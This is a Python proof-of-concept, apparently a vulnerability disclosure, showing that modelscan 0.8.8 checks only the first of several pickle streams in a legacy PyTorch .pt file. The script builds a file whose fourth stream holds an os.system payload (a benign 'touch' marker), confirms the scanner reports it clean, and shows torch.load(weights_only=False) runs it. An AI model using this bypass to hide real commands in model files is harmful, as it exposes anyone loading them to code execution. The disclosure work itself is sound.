| |
| """Self-contained PoC: modelscan 0.8.8 inspects only the first of multiple sequential |
| pickle streams in a PyTorch legacy .pt, reporting a malicious file as clean while |
| torch.load(weights_only=False) executes the payload. |
| |
| Requires: modelscan==0.8.8, torch. Run: python poc.py |
| Payload is a benign marker (touch MP_legacy_pwn); no network, no destructive action. |
| """ |
| import os, sys, pickle, subprocess |
|
|
# Header constant of the legacy (pre-zip) torch.save format: the first pickle
# stream in such a file holds this magic number, the second the protocol
# version (1001), the third a sys_info dict. build_multi reproduces that order.
MAGIC = 0x1950a86a20f9469cfc6c


def build_multi(path):
    """Write a legacy-format ``.pt`` at *path* built from five back-to-back pickles.

    The first three streams (magic, protocol version, empty sys_info dict)
    mimic the legacy ``torch.save`` header; the fourth is the object whose
    ``__reduce__`` yields the marker-file command; the fifth is a trailing
    empty list. A scanner that only inspects the first stream sees a bare
    integer and nothing else.
    """

    class Payload:
        # Reduces to an os.system call that merely creates a marker file.
        def __reduce__(self):
            return (os.system, ("touch MP_legacy_pwn",))

    parts = (
        MAGIC,
        1001,
        {},
        Payload(),
        [],
    )
    with open(path, "wb") as fh:
        for obj in parts:
            fh.write(pickle.dumps(obj))
|
|
|
|
def build_single(path):
    """Write a one-stream control pickle at *path*.

    The pickled object reduces to ``os.system("true")`` (a no-op command), so
    a working scanner should report the ``system`` call. This establishes that
    the scanner detects the pattern at all before the multi-stream case is
    tested.
    """

    class Ctl:
        def __reduce__(self):
            return (os.system, ("true",))

    blob = pickle.dumps(Ctl())
    with open(path, "wb") as fh:
        fh.write(blob)
|
|
|
|
def scan(path):
    """Run ``modelscan -p path`` and return its stdout and stderr concatenated.

    The exit status is deliberately ignored: callers decide by searching the
    text for phrases ("No issues found", "system"). If the ``modelscan``
    executable is not on PATH, subprocess raises FileNotFoundError rather
    than the failure being masked.
    """
    proc = subprocess.run(
        ["modelscan", "-p", path],
        capture_output=True,
        text=True,
    )
    return f"{proc.stdout}{proc.stderr}"
|
|
|
|
# --- 1. multi-stream legacy .pt: does the scanner report it clean? ----------
build_multi("evil_legacy.pt")
multi_clean = "No issues found" in scan("evil_legacy.pt")

# --- 2. does torch.load actually run the embedded __reduce__? ---------------
# Remove any stale marker so its presence afterwards can only come from this load.
if os.path.exists("MP_legacy_pwn"):
    os.remove("MP_legacy_pwn")
import torch
# weights_only=False is the unsafe path: arbitrary reduce callables are
# invoked during unpickling. Newer torch releases default to
# weights_only=True, which refuses such callables; that is the mitigation
# on the loader side, independent of any scanner.
try:
    torch.load("evil_legacy.pt", weights_only=False)
except Exception:
    load_ok = False
else:
    load_ok = True
executed = os.path.exists("MP_legacy_pwn")

# --- 3. control: a plain single-stream pickle must still be flagged ---------
build_single("evil_single.pkl")
single_flagged = "system" in scan("evil_single.pkl").lower()

# --- report -----------------------------------------------------------------
results = (
    ("multi-stream .pt scan clean :", multi_clean),
    ("torch.load completed cleanly:", load_ok),
    ("loader executed payload :", executed),
    ("single-stream control flagged:", single_flagged),
)
for label, value in results:
    print(label, value)
# The bypass is only confirmed when the scanner is clean, the load succeeds,
# the marker appears, and the control case proves the scanner works at all.
ok = all(value for _, value in results)
print("RESULT:", "PASS - scanner bypass confirmed" if ok else "FAIL")
sys.exit(int(not ok))
|
|